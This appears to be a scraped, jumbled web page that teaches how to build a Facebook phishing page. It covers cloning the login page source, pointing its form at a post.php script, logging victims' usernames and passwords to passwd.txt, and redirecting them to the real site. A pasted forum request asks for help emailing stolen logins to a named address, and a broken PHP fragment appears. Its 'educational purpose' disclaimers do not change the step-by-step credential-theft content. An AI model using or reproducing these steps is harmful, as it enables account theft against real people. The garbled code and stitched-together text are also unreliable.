Facebook Phishing Php Script

Oct 12th, 2014
  1. Facebook Phishing Files
  2. Facebook Phishing Page Download
  3. Facebook Phishing Site
  1. After the created data index.htm and post.php have been uploaded, the Facebook phishing page is ready. If you now click on the link to the index.htm file, the created Facebook phishing page will open. This should look almost identical to the Facebook login page.
  2. Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php” Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page. Next, create a new notepad document with the name of.
  3. It’s a free and open source Social Engineering Framework (SCRIPT) that helps the phishing attacks and fake emails. And it’s includes phishing pages, fake email, fake email with file attachment and other stuff that helps you in Social Engineering Attack. The application is coded in PHP and it has a very good interface that called Metro.

Facebook Phishing Files

In my previous post, I explain the easy method to hack Facebook, WhatsApp, Instagram, etc.So you need to read my previous post because this was read the article, and now many of my friends ask me for email that “How to hack Facebook id using phishing attack” because it is the most powerful trick to get your username and password for any of your victims or your Facebook friend account.

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  1. I have this script but can someone help me to modify it so that when the index page is clicked it will go to a particular first page, which will be for 5 seconds before redirecting to the real index page which is a fake login page that contains the form . Then when the form is filled in and submitted, it will then direct to the real yahoo original page while the users login information will be sent to my attached email in the script (wire_force@yahoo.com My heart of appreciation to anyone that is able to help.
  2. Note: This is for educational purpose!
  3. <?php
  4. $message = 'username: ' . $_POST
  5. $message .= 'password: ' . $_POST
  6. $to = 'wire_force@yahoo.com';
  7. $message);
  8. ?>
  9. real.site/login.php?
RAW Paste Data

How To Create Facebook Phishing Page. hack Facebook account

Today I will tell you how you can create a Facebook Phishing page and how hackers hack anyone’s Facebook Account using the Facebook phishing page. let’s open the original Facebook page by navigating the Facebook page URL.

First of all, we open our browser and then go to Facebook.com page.

After opening the Facebook page, we need Facebook source code let’s open the source code there is two option reading the source code right-click and click the View page source code and second is shortcut key press Ctrl + U.

Facebook source source code page will open in new window now we copy the entire Facebook source code.

Copy Source Code Facebook Page

After copy the source code we need to create a file open any editor I’m used leafpad and paste the entire source into this file.

After paste, the Facebook Source code looks like this. we need to find the line action= press CTRL+F if you use other editors your shortcut key is different, and search for action=.

Find the action= line in the Source Code.
Facebook Phishing Php Script

After we found the action= line here we see another Facebook URL First we remove the login URL remember don’t remove the other line. if you remove something by mistake please copy the entire code again and repeat the process.

Now we need to create another PHP file and copy the PHP code and paste into your new file and then save the file you can choose any name of the file.

and again go to the Facebook source and again search the action= and put your new PHP file name inside the double quote, In my case my file name is post.php.

and saved the as index.html Facebook source file.

Facebook Account – Save the File (Index.html) Name.

After Save the file we need to create a another file passwd.txt, why we need to create passwd.txt In this file we found our target username and password.

Facebook Account – Create the Passwd.txt File.

Facebook Phishing Page Download

After all this process we need to add permission for all files run the chmod command and all read write executable permission.

Adding Permission all the files

Now we start our local Apache server If you want to access the page on the internet you need web hosting I’m setup the Facebook phishing page on our local machine.

Facebook Phishing Site

our Apache server is started now open the browser and navigate our local IP address. After open the page you see a Facebook login page where we put our testing username and password please don’t put your original credentials here.

After filling the email/phone and password this page redirects to the original Facebook page and our test username and password are saved on the passwd.txt file.

Let’s check the passwd.txt file.

Note: Remember don’t use the process for illegal activity, if you enter your own original username and password and your account is hacked I’m not responsible.

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